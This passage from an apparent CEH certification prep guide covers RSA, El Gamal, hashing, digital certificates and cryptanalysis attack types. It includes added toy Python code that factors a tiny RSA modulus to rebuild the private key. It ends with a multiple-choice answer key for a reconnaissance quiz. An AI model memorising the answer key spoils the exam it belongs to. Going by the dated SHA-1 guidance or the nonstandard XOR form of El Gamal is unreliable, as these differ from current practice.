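    """Textbook RSA: c = m^e mod n (no padding; illustration only)."""
    e, n = public
    if not 0 <= m < n:
        raise ValueError("message must be an integer in [0, n)")
    return pow(m, e, n)


def rsa_decrypt(c: int, private: Key) -> int:
    """m = c^d mod n."""
    d, n = private
    return pow(c, d, n)


def factor_by_trial_division(n: int) -> Tuple[int, int]:
    """The 'reverse operation' the text calls hard: recover p and q from n.
    Feasible only for a toy modulus, which is exactly why real RSA uses
    primes of hundreds of digits."""
    for candidate in range(2, isqrt(n) + 1):
        if n % candidate == 0:
            return candidate, n // candidate
    raise ValueError("n has no nontrivial factor")


def recover_private_key(public: Key) -> Key:
    """Given only (e, n), factor n and rebuild d: once the factoring succeeds,
    the private key follows from the public one by step 4."""
    e, n = public
    p, q = factor_by_trial_division(n)
    return pow(e, -1, (p - 1) * (q - 1)), n


if __name__ == "__main__":
    public, private = rsa_keygen(61, 53, 17)
    print(public, private)                 # (17, 3233) (2753, 3233)
    c = rsa_encrypt(65, public)
    print(c, rsa_decrypt(c, private))      # 2790 65
    print(recover_private_key(public))     # (2753, 3233)
```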
El Gamal
The Diffie-Hellman key exchange concepts were expanded by Dr. T. El Gamal to apply to encryption
and digital signatures. In his approach, El Gamal used the problem of finding the discrete logarithm of
a number as a hard, one-way function. El Gamal encryption is summarized as follows:
1. Given the prime number p and the integer g, Alice uses her private key, a, to compute her
public key as y_a = g^a mod p.
2. For Bob to send message M to Alice:
a. Bob generates a random number b < p.
b. Bob computes y_b = g^b mod p and y_m = M XOR y_a^b = M XOR g^(ab) mod p.
c. Bob sends y_b, y_m to Alice, and Alice computes y_b^a = g^(ab) mod p.
3. Therefore, M = y_b^a XOR y_m = g^(ab) mod p XOR M XOR g^(ab) mod p.
The El Gamal public-key cryptosystem is not patented and is available for use by the public.
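The three steps above in code, as an added example that is not from the book. It follows the page's XOR form y_m = M XOR g^(ab) mod p; the standard El Gamal cryptosystem instead multiplies M by g^(ab) mod p, so read the XOR here as the page's illustration of the shared-secret idea. The values p = 23, g = 5, a = 6 and b = 15 are constructed toy parameters.

```python
"""El Gamal key exchange and encryption as summarized above, using the page's
XOR form ym = M XOR g^(ab) mod p.

Added example, not code from the CEH Prep Guide. p = 23, g = 5, a = 6 and
b = 15 are constructed toy values; textbook El Gamal multiplies M by the
shared value g^(ab) mod p instead of XORing it."""
import secrets
from typing import Tuple


def elgamal_public_key(p: int, g: int, a: int) -> int:
    """Step 1: Alice publishes y_a = g^a mod p and keeps a private."""
    return pow(g, a, p)


def random_b(p: int) -> int:
    """Step 2a: a fresh random b with 0 < b < p, from the OS CSPRNG."""
    return secrets.randbelow(p - 1) + 1


def elgamal_encrypt(p: int, g: int, ya: int, M: int, b: int) -> Tuple[int, int]:
    """Steps 2b-2c: Bob computes y_b = g^b mod p and y_m = M XOR y_a^b mod p
    and sends (y_b, y_m). b is passed in so the exchange is reproducible."""
    if not 1 <= b < p:
        raise ValueError("b must satisfy 0 < b < p")
    yb = pow(g, b, p)
    shared = pow(ya, b, p)          # = g^(ab) mod p
    return yb, M ^ shared


def elgamal_decrypt(p: int, a: int, yb: int, ym: int) -> int:
    """Step 3: Alice computes y_b^a mod p = g^(ab) mod p and XORs it away."""
    shared = pow(yb, a, p)
    return ym ^ shared


def round_trip(p: int, g: int, a: int, b: int, M: int) -> Tuple[int, int, int]:
    """Run the whole exchange; returns (y_b, y_m, recovered M)."""
    ya = elgamal_public_key(p, g, a)
    yb, ym = elgamal_encrypt(p, g, ya, M, b)
    return yb, ym, elgamal_decrypt(p, a, yb, ym)


if __name__ == "__main__":
    print(round_trip(23, 5, 6, 15, 12))               # (19, 14, 12)
    print(round_trip(23, 5, 6, random_b(23), 12)[2])  # 12, whatever b is drawn
```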
Digital Signatures
A digital signature is intended to provide at least the same protection and guarantees as obtained
when a person physically signs a document. Because data in digital, electronic form can be
processed, digital signatures also can be used to detect unauthorized modifications of a document.
According to the U.S. National Institute of Standards and Technology (NIST), "Digital signatures are
used to detect unauthorized modifications to data and to authenticate the identity of the signatory. In
addition, the recipient of signed data can use a digital signature in proving to a third party that the
signature was in fact generated by the signatory."
Hash Function
Digital signature protections are accomplished by transforming a message or document into a smaller
representation that is uniquely bound to the original document. This binding means that if a change
is made in the original document, the resulting compressed representation will also change. In
computational terms, a digital signature is generated by passing the message or file to be transmitted
through a one-way hash function. The hash function produces a fixed size output, called a message
digest, from a variable size input using all of the original file's data. The message digest is uniquely
derived from the input file. An ideal hash algorithm should have the following characteristics:
The original file cannot be recreated from the message digest.
Two files should not have the same message digest.
Given a file and its corresponding message digest, it should not be feasible to find another file
with the same message digest.
These characteristics are analogous to the following examples of a birthday attack on a hash function:
If you were in a room with other people, what would be the necessary sample size n of
individuals in the room to have a better than 50/50 chance of someone having the same birthday
as you? (The answer is 253.)
If you were in a room with other people, what would be the necessary sample size n of
individuals in the room to have a better than 50/50 chance of at least two people having a
common birthday? (The answer is 23, because with 23 people in a room, there are n(n - 1)/2 or
253 pairs of individuals in the room.)
In general, SHA actually denotes five approved algorithms for generating a message digest. The
five algorithms are given the designations SHA-1, SHA-224, SHA-256, SHA-384, and SHA-512. The
latter four hash algorithms are sometimes known collectively as SHA-2.
In the digital signature standard, SHA-1 is employed to generate a fixed-length message digest from a
variable length input file. The SHA-1 message digest is 160 bits long for any input file that is less than
2^64 bits. The SHA-1 algorithm processes input messages in block sizes of 512 bits.
MD5
MD5 is a hash function that generates a fixed length message digest of 128 bits from input files of
arbitrary length. Like the SHA-1 algorithm, MD5 processes the input file in blocks of 512 bits. MD5
was developed in 1991 by Ronald Rivest.
Digital Certificates
A digital certificate is a certification mechanism used to bind individuals to their public keys. A trusted
entity is needed to guarantee the public key is the valid public key of the associated person. This
entity is a certificate authority. A Certificate Authority (CA) acts as notary by verifying a person's
identity and issuing a certificate that vouches for the public key of the named individual. In order to
verify that the certification agent is not fraudulent, the certification agent signs the certificate with its
own private key. This certificate is then sent to a repository, which holds the certificates and Certificate
Revocation Lists (CRLs) that denote the revoked certificates.
To verify the CA's signature, its public key must be cross-certified with another CA. Figure 15-2
illustrates the use of digital certificates in a transaction.
Figure 15-3: The format of the CCITT-ITU/ ISO X.509 digital certificate
As discussed earlier, a certificate that has expired or is invalid is put into a CRL to notify potential
users. The CRL is signed by the CA for authentication and preservation of integrity. Figure 15-4
illustrates a CRL for an X.509 version 2 certificate.
Cryptanalysis
Cryptanalysis is the act of deciphering an encrypted message without originally having the key.
Cryptanalysis could involve determining the secret key by some method or using a variety of
approaches to unscramble the message. Cryptanalysis is used to obtain valuable information and to
pass on altered or fake information in order to deceive the original intended recipient.
The common types of cryptanalysis attacks against cryptosystems are listed in Table 15-2.
Known plaintext. The adversary has a copy of the plaintext corresponding to the ciphertext.
Chosen plaintext. Selected plaintext is encrypted and produces corresponding ciphertext output.
Brute force. The adversary conducts an exhaustive search of the key space until the correct key is
found.
Ciphertext only. The ciphertext alone is available to the attacker.
Adaptive chosen plaintext. This is a form of a chosen plaintext attack where the selection of the
plaintext is adjusted depending on previous results.
Chosen ciphertext. The attacker attempts to decrypt selected ciphertext while having access to the
corresponding plaintext.
Adaptive chosen ciphertext. The attacker attempts to decrypt selected portions of ciphertext based
on the results of previous attempts.
Meet-in-the-middle. The adversary attacks double encryption schemes by encrypting known plaintext
from one end with each possible key (K) and comparing the results in the middle with the decryption
of the corresponding ciphertext with each possible K.
Linear cryptanalysis. The attacker generates a linear estimation of the key using pairs of known
plaintext and corresponding ciphertext.
Differential cryptanalysis. This attack is normally applied to block cipher symmetric key cryptographic
systems. The adversary looks at ciphertext pairs, which were generated through the encryption of
plaintext pairs with specific differences, and analyzes the effect of these differences.
1. Answer: c
ARTNIC does not exist. The other RIRs listed are: RIPE Network Coordination Centre (RIPE
NCC), African Network Information Centre (AfriNIC), and Latin American and Caribbean Internet
Address Registry (LACNIC).
2. Answer: b
3. Answer: a
4. Answer: a
5. Answer: b
Answer c is correct if the TTL reaches 0, but the router always decrements the TTL by 1 at each
hop.
6. Answer: b
7. Answer: a
8. Answer: c
Linux uses UDP for its Traceroute; Windows uses ICMP.
9. Answer: d
10. Answer: b
11. Answer: d
12. Answer: d
13. Answer: b
Traceroute is used to determine the route between the attacker and the target.
14. Answer: a
15. Answer: c
While the order of steps in information gathering is often varied, Whois is commonly the first step.
16. Answer: a
17. Answer: c
While not impossible, the other three choices are better suited for open searching.
18. Answer: b
19. Answer: a
20. Answer: d
21. Answer: c